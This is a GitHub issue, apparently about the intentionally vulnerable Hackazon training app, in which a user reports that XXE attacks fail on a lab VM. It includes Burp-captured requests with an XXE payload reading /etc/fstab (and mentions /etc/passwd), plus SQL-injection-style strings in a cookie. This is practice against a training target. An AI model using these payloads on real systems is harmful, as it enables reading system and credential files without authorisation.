This repository was archived by the owner on May 18, 2021. It is now read-only.

Issues with XXE #25

@artsalmon


XXE vulnerabilities seem not to function.

I have verified that XXE is enabled in the vulnerabilities.md file. I have also logged in to the admin page and ensured that there are pages where the XXE vulnerability was enabled. I turned it on in every location that I could, just in case. I verified the PHP files in the config location to ensure that XXE was set to true for the location I needed. I enabled XXE for the Cart/View area.

I set up Burp to intercept the HTTP GET requests, and I captured the code below.

---ORIGINAL CODE---
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1
---END OF CODE---

I modified the code to have the XML example code in the vulnerability:

---MODIFIED CODE---
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1

<'?xml version="1.0" encoding="utf-8"?>
<'!DOCTYPE roottag [<'!ENTITY goodies SYSTEM "file:///etc/fstab">]>
<'roottag>&goodies;
---END OF CODE---

NOTE: I added ' at the start of each line to allow the code to display correctly in the note. In the real example, the ' was removed.

I have also modified the goodies to see if the PASSWD file would display.

I only get an HTML 400 return error.

I have cleared the cache, I have tried doing this in a VM with no other content, and I ensured that Firefox was updated.

Has anyone tested and/or seen XXE vulnerabilities function with hackazon?
